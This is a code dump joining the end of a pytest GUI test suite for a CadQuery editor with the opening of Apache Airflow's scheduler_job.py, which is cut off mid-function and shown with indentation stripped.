assert(editor.document().isModified() == False)
monkeypatch.setattr(QFileDialog, 'getOpenFileName',
staticmethod(filename2))
editor.open()
assert(editor.get_text_with_eol() == 'a')
#check that save as works properly
os.remove('test2.py')
editor.save_as()
assert(os.path.exists(filename2()[0]))
#test persistance
settings = QSettings('test')
editor.saveComponentState(settings)
editor.new()
assert(editor.get_text_with_eol() == '')
editor.restoreComponentState(settings)
assert(editor.get_text_with_eol() == 'a')
#test error handling
os.remove('test2.py')
assert(not os.path.exists('test2.py'))
editor.restoreComponentState(settings)
@pytest.mark.repeat(1)
def test_editor_autoreload(monkeypatch,editor):
qtbot, editor = editor
TIMEOUT = 500
# start out with autoreload enabled
editor.autoreload(True)
with open('test.py','w') as f:
f.write(code)
assert(editor.get_text_with_eol() == '')
editor.load_from_file('test.py')
assert(len(editor.get_text_with_eol()) > 0)
# wait for reload.
with qtbot.waitSignal(editor.triggerRerender, timeout=TIMEOUT):
# modify file - NB: separate process is needed to avoid Widows quirks
modify_file(code_bigger_object)
# check that editor has updated file contents
assert(code_bigger_object.splitlines()[2] in editor.get_text_with_eol())
# disable autoreload
editor.autoreload(False)
# Wait for reload in case it incorrectly happens. A timeout should occur
# instead because a re-render should not be triggered with autoreload
# disabled.
with pytest.raises(pytestqt.exceptions.TimeoutError):
with qtbot.waitSignal(editor.triggerRerender, timeout=TIMEOUT):
# re-write original file contents
modify_file(code)
# editor should continue showing old contents since autoreload is disabled.
assert(code_bigger_object.splitlines()[2] in editor.get_text_with_eol())
# Saving a file with autoreload disabled should not trigger a rerender.
with pytest.raises(pytestqt.exceptions.TimeoutError):
with qtbot.waitSignal(editor.triggerRerender, timeout=TIMEOUT):
editor.save()
editor.autoreload(True)
# Saving a file with autoreload enabled should trigger a rerender.
with qtbot.waitSignal(editor.triggerRerender, timeout=TIMEOUT):
editor.save()
def test_console(main):
qtbot, win = main
console = win.components['console']
# test execute_command
a = []
console.push_vars({'a' : a})
console.execute_command('a.append(1)')
assert(len(a) == 1)
# test print_text
pos_orig = console._prompt_pos
console.print_text('a')
assert(console._prompt_pos == pos_orig + len('a'))
def test_viewer(main):
qtbot, win = main
viewer = win.components['viewer']
#not sure how to test this, so only smoke tests
#trigger all 'View' actions
actions = viewer._actions['View']
for a in actions: a.trigger()
code_module = \
'''def dummy(): return True'''
code_import = \
'''from module import dummy
assert(dummy())'''
def test_module_import(main):
qtbot, win = main
editor = win.components['editor']
debugger = win.components['debugger']
traceback_view = win.components['traceback_viewer']
#save the dummy module
with open('module.py','w') as f:
f.write(code_module)
#run the code importing this module
editor.set_text(code_import)
debugger._actions['Run'][0].triggered.emit()
#verify that no exception was generated
assert(traceback_view.current_exception.text() == '')
def test_auto_fit_view(main_clean):
def concat(eye,proj,scale):
return eye+proj+(scale,)
def approx_view_properties(eye,proj,scale):
return pytest.approx(eye+proj+(scale,))
qtbot, win = main_clean
editor = win.components['editor']
debugger = win.components['debugger']
viewer = win.components['viewer']
object_tree = win.components['object_tree']
view = viewer.canvas.view
viewer.preferences['Fit automatically'] = False
eye0,proj0,scale0 = view.Eye(),view.Proj(),view.Scale()
# check if camera position is adjusted automatically when rendering for the
# first time
debugger.render()
eye1,proj1,scale1 = view.Eye(),view.Proj(),view.Scale()
assert( concat(eye0,proj0,scale0) != \
approx_view_properties(eye1,proj1,scale1) )
# check if camera position is not changed fter code change
editor.set_text(code_bigger_object)
debugger.render()
eye2,proj2,scale2 = view.Eye(),view.Proj(),view.Scale()
assert( concat(eye1,proj1,scale1) == \
approx_view_properties(eye2,proj2,scale2) )
# check if position is adjusted automatically after erasing all objects
object_tree.removeObjects()
debugger.render()
eye3,proj3,scale3 = view.Eye(),view.Proj(),view.Scale()
assert( concat(eye2,proj2,scale2) != \
approx_view_properties(eye3,proj3,scale3) )
# check if position is adjusted automatically if settings are changed
viewer.preferences['Fit automatically'] = True
editor.set_text(code)
debugger.render()
eye4,proj4,scale4 = view.Eye(),view.Proj(),view.Scale()
assert( concat(eye3,proj3,scale3) != \
approx_view_properties(eye4,proj4,scale4) )
def test_preserve_properties(main):
qtbot, win = main
debugger = win.components['debugger']
debugger._actions['Run'][0].triggered.emit()
object_tree = win.components['object_tree']
object_tree.preferences['Preserve properties on reload'] = True
assert(object_tree.CQ.childCount() == 1)
props = object_tree.CQ.child(0).properties
props['Visible'] = False
props['Color'] = '#caffee'
props['Alpha'] = 0.5
debugger._actions['Run'][0].triggered.emit()
assert(object_tree.CQ.childCount() == 1)
props = object_tree.CQ.child(0).properties
assert(props['Visible'] == False)
assert(props['Color'].name() == '#caffee')
assert(props['Alpha'] == 0.5)
def test_selection(main_multi,mocker):
qtbot, win = main_multi
viewer = win.components['viewer']
object_tree = win.components['object_tree']
CQ = object_tree.CQ
obj1 = CQ.child(0)
obj2 = CQ.child(1)
# export with two selected objects
obj1.setSelected(True)
obj2.setSelected(True)
object_tree._export_STEP_action.triggered.emit()
imported = cq.importers.importStep('out.step')
assert(len(imported.solids().vals()) == 2)
# export with one selected objects
obj2.setSelected(False)
object_tree._export_STEP_action.triggered.emit()
imported = cq.importers.importStep('out.step')
assert(len(imported.solids().vals()) == 1)
# export with one selected objects
obj1.setSelected(False)
CQ.setSelected(True)
object_tree._export_STEP_action.triggered.emit()
imported = cq.importers.importStep('out.step')
assert(len(imported.solids().vals()) == 2)
# check if viewer and object tree are properly connected
CQ.setSelected(False)
obj1.setSelected(True)
obj2.setSelected(True)
ctx = viewer._get_context()
ctx.InitSelected()
shapes = []
while ctx.MoreSelected():
shapes.append(ctx.SelectedShape())
ctx.NextSelected()
assert(len(shapes) == 2)
viewer.fit()
qtbot.mouseClick(viewer.canvas, Qt.LeftButton)
assert(len(object_tree.tree.selectedItems()) == 0)
viewer.sigObjectSelected.emit([obj1.shape_display.wrapped])
assert(len(object_tree.tree.selectedItems()) == 1)
# go through different handleSelection paths
qtbot.mouseClick(object_tree.tree, Qt.LeftButton)
qtbot.keyClick(object_tree.tree, Qt.Key_Down)
qtbot.keyClick(object_tree.tree, Qt.Key_Down)
qtbot.keyClick(object_tree.tree, Qt.Key_Down)
qtbot.keyClick(object_tree.tree, Qt.Key_Down)
assert(object_tree._export_STL_action.isEnabled() == False)
assert(object_tree._export_STEP_action.isEnabled() == False)
assert(object_tree._clear_current_action.isEnabled() == False)
assert(object_tree.properties_editor.isEnabled() == False)
def test_closing(main_clean_do_not_close):
qtbot,win = main_clean_do_not_close
editor = win.components['editor']
# make sure that windows is visible
assert(win.isVisible())
# should not quit
win.close()
assert(win.isVisible())
# should quit
editor.reset_modified()
win.close()
assert(not win.isVisible())
def test_check_for_updates(main,mocker):
qtbot,win = main
# patch requests
import requests
mocker.patch.object(requests.models.Response,'json',
return_value=[{'tag_name' : '0.0.2','draft' : False}])
# stub QMessageBox about
about_stub = mocker.stub()
mocker.patch.object(QMessageBox, 'about', about_stub)
import cadquery
cadquery.__version__ = '0.0.1'
win.check_for_cq_updates()
assert(about_stub.call_args[0][1] == 'Updates available')
cadquery.__version__ = '0.0.3'
win.check_for_cq_updates()
assert(about_stub.call_args[0][1] == 'No updates available')
@pytest.mark.skipif(sys.platform.startswith('linux'),reason='Segfault workaround for linux')
def test_screenshot(main,mocker):
qtbot,win = main
mocker.patch.object(QFileDialog, 'getSaveFileName', return_value=('out.png',''))
viewer = win.components['viewer']
viewer._actions['Tools'][0].triggered.emit()
assert(os.path.exists('out.png'))
def test_resize(main):
qtbot,win = main
editor = win.components['editor']
editor.hide()
qtbot.wait(50)
editor.show()
qtbot.wait(50)
code_simple_step = \
'''import cadquery as cq
imported = cq.importers.importStep('shape.step')
'''
def test_relative_references(main):
# create code with a relative reference in a subdirectory
p = Path('test_relative_references')
p.mkdir_p()
p_code = p.joinpath('code.py')
p_code.write_text(code_simple_step)
# create the referenced step file
shape = cq.Workplane("XY").box(1, 1, 1)
p_step = p.joinpath('shape.step')
export(shape, "step", p_step)
# open code
qtbot, win = main
editor = win.components['editor']
editor.load_from_file(p_code)
# render
debugger = win.components['debugger']
debugger._actions['Run'][0].triggered.emit()
# assert no errors
traceback_view = win.components['traceback_viewer']
assert(traceback_view.current_exception.text() == '')
# assert one object has been rendered
obj_tree_comp = win.components['object_tree']
assert(obj_tree_comp.CQ.childCount() == 1)
# clean up
p_code.remove_p()
p_step.remove_p()
p.rmdir_p()
code_color = \
'''
import cadquery as cq
result = cq.Workplane("XY" ).box(1, 1, 1)
show_object(result, name ='1')
show_object(result, name ='2', options=dict(alpha=0.5,color='red'))
show_object(result, name ='3', options=dict(alpha=0.5,color='#ff0000'))
show_object(result, name ='4', options=dict(alpha=0.5,color=(255,0,0)))
show_object(result, name ='5', options=dict(alpha=0.5,color=(1.,0,0)))
show_object(result, name ='6', options=dict(rgba=(1.,0,0,.5)))
show_object(result, name ='7', options=dict(color=('ff','cc','dd')))
'''
def test_render_colors(main_clean):
qtbot, win = main_clean
obj_tree = win.components['object_tree']
editor = win.components['editor']
debugger = win.components['debugger']
log = win.components['log']
editor.set_text(code_color)
debugger._actions['Run'][0].triggered.emit()
CQ = obj_tree.CQ
# object 1 (defualt color)
r,g,b,a = get_rgba(CQ.child(0).ais)
assert( a == 0 )
assert( r != 1.0 )
# object 2
r,g,b,a = get_rgba(CQ.child(1).ais)
assert( a == 0.5 )
assert( r == 1.0 )
# object 3
r,g,b,a = get_rgba(CQ.child(2).ais)
assert( a == 0.5)
assert( r == 1.0 )
# object 4
r,g,b,a = get_rgba(CQ.child(3).ais)
assert( a == 0.5 )
assert( r == 1.0 )
# object 5
r,g,b,a = get_rgba(CQ.child(4).ais)
assert( a == 0.5 )
assert( r == 1.0 )
# object 6
r,g,b,a = get_rgba(CQ.child(5).ais)
assert( a == 0.5 )
assert( r == 1.0 )
# check if error occured
qtbot.wait(100)
assert('Unknown color format' in log.toPlainText().splitlines()[-1])
def test_render_colors_console(main_clean):
qtbot, win = main_clean
obj_tree = win.components['object_tree']
log = win.components['log']
console = win.components['console']
console.execute_command(code_color)
def get_rgba(ais):
alpha = ais.Transparency()
color = get_occ_color(ais)
return color.redF(),color.redF(),color.redF(),alpha
CQ = obj_tree.CQ
# object 1 (defualt color)
r,g,b,a = get_rgba(CQ.child(0).ais)
assert( a == 0 )
assert( r != 1.0 )
# object 2
r,g,b,a = get_rgba(CQ.child(1).ais)
assert( a == 0.5 )
assert( r == 1.0 )
# object 3
r,g,b,a = get_rgba(CQ.child(2).ais)
assert( a == 0.5)
assert( r == 1.0 )
# object 4
r,g,b,a = get_rgba(CQ.child(3).ais)
assert( a == 0.5 )
assert( r == 1.0 )
# object 5
r,g,b,a = get_rgba(CQ.child(4).ais)
assert( a == 0.5 )
assert( r == 1.0 )
# object 6
r,g,b,a = get_rgba(CQ.child(5).ais)
assert( a == 0.5 )
assert( r == 1.0 )
# check if error occured
qtbot.wait(100)
assert('Unknown color format' in log.toPlainText().splitlines()[-1])
def test_confirm_new(monkeypatch,editor):
qtbot, editor = editor
#check that initial state is as expected
assert(editor.modified == False)
editor.document().setPlainText(code)
assert(editor.modified == True)
#monkeypatch the confirmation dialog and run both scenarios
def cancel(*args, **kwargs):
return QMessageBox.No
def ok(*args, **kwargs):
return QMessageBox.Yes
monkeypatch.setattr(QMessageBox, 'question',
staticmethod(cancel))
editor.new()
assert(editor.modified == True)
assert(conv_line_ends(editor.get_text_with_eol()) == code)
monkeypatch.setattr(QMessageBox, 'question',
staticmethod(ok))
editor.new()
assert(editor.modified == False)
assert(editor.get_text_with_eol() == '')
code_show_topods = \
'''
import cadquery as cq
result = cq.Workplane("XY" ).box(1, 1, 1)
show_object(result.val().wrapped)
'''
def test_render_topods(main):
qtbot, win = main
obj_tree_comp = win.components['object_tree']
editor = win.components['editor']
debugger = win.components['debugger']
console = win.components['console']
# check that object was rendered
assert(obj_tree_comp.CQ.childCount() == 1)
# check that object was removed
obj_tree_comp._toolbar_actions[0].triggered.emit()
assert(obj_tree_comp.CQ.childCount() == 0)
# check that object was rendered usin explicit show_object call
editor.set_text(code_show_topods)
debugger._actions['Run'][0].triggered.emit()
assert(obj_tree_comp.CQ.childCount() == 1)
# test rendering of topods object via console
console.execute('show(result.val().wrapped)')
assert(obj_tree_comp.CQ.childCount() == 2)
# test rendering of list of topods object via console
console.execute('show([result.val().wrapped,result.val().wrapped])')
assert(obj_tree_comp.CQ.childCount() == 3)
code_show_shape_list = \
'''
import cadquery as cq
result1 = cq.Workplane("XY" ).box(1, 1, 1).val()
result2 = cq.Workplane("XY",origin=(0,1,1)).box(1, 1, 1).val()
show_object(result1)
show_object([result1,result2])
'''
def test_render_shape_list(main):
qtbot, win = main
log = win.components['log']
obj_tree_comp = win.components['object_tree']
editor = win.components['editor']
debugger = win.components['debugger']
console = win.components['console']
# check that object was removed
obj_tree_comp._toolbar_actions[0].triggered.emit()
assert(obj_tree_comp.CQ.childCount() == 0)
# check that object was rendered usin explicit show_object call
editor.set_text(code_show_shape_list)
debugger._actions['Run'][0].triggered.emit()
assert(obj_tree_comp.CQ.childCount() == 2)
# test rendering of Shape via console
console.execute('show(result1)')
console.execute('show([result1,result2])')
assert(obj_tree_comp.CQ.childCount() == 4)
# smoke test exception in show
console.execute('show("a")')
code_show_assy = \
'''import cadquery as cq
result1 = cq.Workplane("XY" ).box(3, 3, 0.5)
assy = cq.Assembly(result1)
show_object(assy)
'''
def test_render_assy(main):
qtbot, win = main
obj_tree_comp = win.components['object_tree']
editor = win.components['editor']
debugger = win.components['debugger']
console = win.components['console']
# check that object was removed
obj_tree_comp._toolbar_actions[0].triggered.emit()
assert(obj_tree_comp.CQ.childCount() == 0)
# check that object was rendered usin explicit show_object call
editor.set_text(code_show_assy)
debugger._actions['Run'][0].triggered.emit()
qtbot.wait(500)
assert(obj_tree_comp.CQ.childCount() == 1)
# test rendering via console
console.execute('show(assy)')
qtbot.wait(500)
assert(obj_tree_comp.CQ.childCount() == 2)
code_show_ais = \
'''import cadquery as cq
from cadquery.occ_impl.assembly import toCAF
import OCP
result1 = cq.Workplane("XY" ).box(3, 3, 0.5)
assy = cq.Assembly(result1)
lab, doc = toCAF(assy)
ais = OCP.XCAFPrs.XCAFPrs_AISObject(lab)
show_object(ais)
'''
def test_render_ais(main):
qtbot, win = main
obj_tree_comp = win.components['object_tree']
editor = win.components['editor']
debugger = win.components['debugger']
console = win.components['console']
# check that object was removed
obj_tree_comp._toolbar_actions[0].triggered.emit()
assert(obj_tree_comp.CQ.childCount() == 0)
# check that object was rendered usin explicit show_object call
editor.set_text(code_show_ais)
debugger._actions['Run'][0].triggered.emit()
qtbot.wait(500)
assert(obj_tree_comp.CQ.childCount() == 1)
# test rendering via console
console.execute('show(ais)')
qtbot.wait(500)
assert(obj_tree_comp.CQ.childCount() == 2)
|
scheduler_job.py | # pylint: disable=no-name-in-module
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import datetime
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from contextlib import ExitStack, redirect_stderr, redirect_stdout, suppress
from datetime import timedelta
from itertools import groupby
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import Any, DefaultDict, Dict, List, Optional, Set, Tuple
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm.session import Session, make_transient
from airflow import models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException, TaskNotFound
from airflow.executors.executor_loader import UNPICKLEABLE_EXECUTORS
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagModel, SlaMiss, errors
from airflow.models.dagbag import DagBag
from airflow.models.dagrun import DagRun
from airflow.models.taskinstance import SimpleTaskInstance, TaskInstanceKey
from airflow.operators.dummy_operator import DummyOperator
from airflow.serialization.serialized_objects import SerializedDAG
from airflow.stats import Stats
from airflow.ti_deps.dep_context import DepContext
from airflow.ti_deps.dependencies_deps import SCHEDULED_DEPS
from airflow.ti_deps.dependencies_states import EXECUTION_STATES
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (
AbstractDagFileProcessorProcess, DagFileProcessorAgent, FailureCallbackRequest, SimpleDagBag,
)
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.session import provide_session
from airflow.utils.state import State
from airflow.utils.types import DagRunType
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
class DagFileProcessorProcess(AbstractDagFileProcessorProcess, LoggingMixin, MultiprocessingStartMethodMixin):
"""Runs DAG processing in a separate process using DagFileProcessor
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: str
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param failure_callback_requests: failure callback to execute
:type failure_callback_requests: List[airflow.utils.dag_processing.FailureCallbackRequest]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(
self,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
failure_callback_requests: List[FailureCallbackRequest]
):
super().__init__()
self._file_path = file_path
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._failure_callback_requests = failure_callback_requests
# The process that was launched to process the given .
self._process: Optional[multiprocessing.process.BaseProcess] = None
# The result of Scheduler.process_file(file_path).
self._result: Optional[Tuple[List[dict], int]] = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time: Optional[datetime.datetime] = None
# This ID is use to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessorProcess.class_creation_counter
self._parent_channel: Optional[MultiprocessingConnection] = None
DagFileProcessorProcess.class_creation_counter += 1
@property
def file_path(self) -> str:
return self._file_path
@staticmethod
def _run_file_processor(
result_channel: MultiprocessingConnection,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
thread_name: str,
failure_callback_requests: List[FailureCallbackRequest]
) -> None:
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: str
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_ids: if specified, only examine DAG ID's that are
in this list
:type dag_ids: list[str]
:param thread_name: the name to use for the process that is launched
:type thread_name: str
:param failure_callback_requests: failure callback to execute
:type failure_callback_requests: list[airflow.utils.dag_processing.FailureCallbackRequest]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log: logging.Logger = logging.getLogger("airflow.processor")
set_context(log, file_path)
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
with ExitStack() as exit_stack:
exit_stack.enter_context(redirect_stdout(StreamLogWriter(log, logging.INFO))) # type: ignore
exit_stack.enter_context(redirect_stderr(StreamLogWriter(log, logging.WARN))) # type: ignore
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
dag_file_processor = DagFileProcessor(dag_ids=dag_ids, log=log)
result: Tuple[List[dict], int] = dag_file_processor.process_file(
file_path=file_path,
pickle_dags=pickle_dags,
failure_callback_requests=failure_callback_requests,
)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception: # pylint: disable=broad-except
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
result_channel.close()
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
def start(self) -> None:
"""
Launch the process and start processing the DAG.
"""
start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(start_method)
self._parent_channel, _child_channel = context.Pipe()
process = context.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
self.file_path,
self._pickle_dags,
self._dag_ids,
"DagFileProcessor{}".format(self._instance_id),
self._failure_callback_requests
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._process = process
self._start_time = timezone.utcnow()
process.start()
def kill(self) -> None:
"""
Kill the process launched to process the file, and ensure consistent state.
"""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
self._kill_process()
def terminate(self, sigkill: bool = False) -> None:
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
with suppress(TimeoutError):
self._process._popen.wait(5) # type: ignore # pylint: disable=protected-access
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self) -> None:
if self._process is None:
raise AirflowException("Tried to kill process before starting!")
if self._process.is_alive() and self._process.pid:
self.log.warning("Killing PID %s", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
@property
def pid(self) -> int:
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None or self._process.pid is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self) -> Optional[int]:
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get exit code before starting!")
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self) -> bool:
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
pass
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self) -> Optional[Tuple[List[dict], int]]:
"""
:return: result of running SchedulerJob.process_file()
:rtype: Optional[Tuple[List[dict], int]]
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self) -> datetime.datetime:
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
@property
def waitable_handle(self):
return self._process.sentinel
class DagFileProcessor(LoggingMixin):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param log: Logger to save the processing process
:type log: logging.Logger
"""
UNIT_TEST_MODE: bool = conf.getboolean('core', 'UNIT_TEST_MODE')
def __init__(self, dag_ids: Optional[List[str]], log: logging.Logger):
super().__init__()
self.dag_ids = dag_ids
self._log = log
@provide_session
def manage_slas(self, dag: DAG, session: Session = None) -> None:
"""
Finding all tasks that have SLAs defined, and sending alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any([isinstance(ti.sla, timedelta) for ti in dag.tasks]):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
qry = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti')
)
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(
or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED
)
)
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis: List[TI] = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == qry.c.task_id,
TI.execution_date == qry.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
if not isinstance(task.sla, timedelta):
continue
dttm = dag.following_schedule(ti.execution_date)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
slas: List[SlaMiss] = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas: # pylint: disable=too-many-nested-blocks
sla_dates: List[datetime.datetime] = [sla.execution_date for sla in slas]
fetched_tis: List[TI] = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis: List[TI] = []
for ti in fetched_tis:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception: # pylint: disable=broad-except
self.log.exception("Could not call sla_miss_callback for DAG %s",
dag.dag_id)
email_content = """\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n<code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}\n{bug}<code></pre>
""".format(task_list=task_list, blocking_task_list=blocking_task_list,
bug=asciiart.bug)
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.",
sla.task_id)
continue
tasks_missed_sla.append(task)
emails: Set[str] = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
"[airflow] SLA miss on DAG=" + dag.dag_id,
email_content)
email_sent = True
notification_sent = True
except Exception: # pylint: disable=broad-except
Stats.incr('sla_email_notification_failure')
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
if email_sent:
sla.email_sent = True
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session: Session, dagbag: DagBag) -> None:
"""
For the DAGs in the given DagBag, record any associated import errors and clears
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(errors.ImportError(
filename=filename,
timestamp=timezone.utcnow(),
stacktrace=stacktrace))
session.commit()
# pylint: disable=too-many-return-statements,too-many-branches
@provide_session
def create_dag_run(
self,
dag: DAG,
dag_runs: Optional[List[DagRun]] = None,
session: Session = None,
) -> Optional[DagRun]:
"""
This method checks whether a new DagRun needs to be created
for a DAG based on scheduling interval.
Returns DagRun if one is scheduled. Otherwise returns None.
"""
# pylint: disable=too-many-nested-blocks
if not dag.schedule_interval:
return None
active_runs: List[DagRun]
if dag_runs is None:
active_runs = DagRun.find(
dag_id=dag.dag_id,
state=State.RUNNING,
external_trigger=False,
session=session
)
else:
active_runs = [
dag_run
for dag_run in dag_runs
if not dag_run.external_trigger
]
# return if already reached maximum active runs and no timeout setting
if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
return None
timed_out_runs = 0
for dr in active_runs:
if (
dr.start_date and dag.dagrun_timeout and
dr.start_date < timezone.utcnow() - dag.dagrun_timeout
):
dr.state = State.FAILED
dr.end_date = timezone.utcnow()
dag.handle_callback(dr, success=False, reason='dagrun_timeout',
session=session)
timed_out_runs += 1
session.commit()
if len(active_runs) - timed_out_runs >= dag.max_active_runs:
return None
# this query should be replaced by find dagrun
last_scheduled_run: Optional[datetime.datetime] = (
session.query(func.max(DagRun.execution_date))
.filter_by(dag_id=dag.dag_id)
.filter(or_(
DagRun.external_trigger == False, # noqa: E712 pylint: disable=singleton-comparison
DagRun.run_type == DagRunType.SCHEDULED.value
)).scalar()
)
# don't schedule @once again
if dag.schedule_interval == '@once' and last_scheduled_run:
return None
# don't do scheduler catchup for dag's that don't have dag.catchup = True
if not (dag.catchup or dag.schedule_interval == '@once'):
# The logic is that we move start_date up until
# one period before, so that timezone.utcnow() is AFTER
# the period end, and the job can be created...
now = timezone.utcnow()
next_start = dag.following_schedule(now)
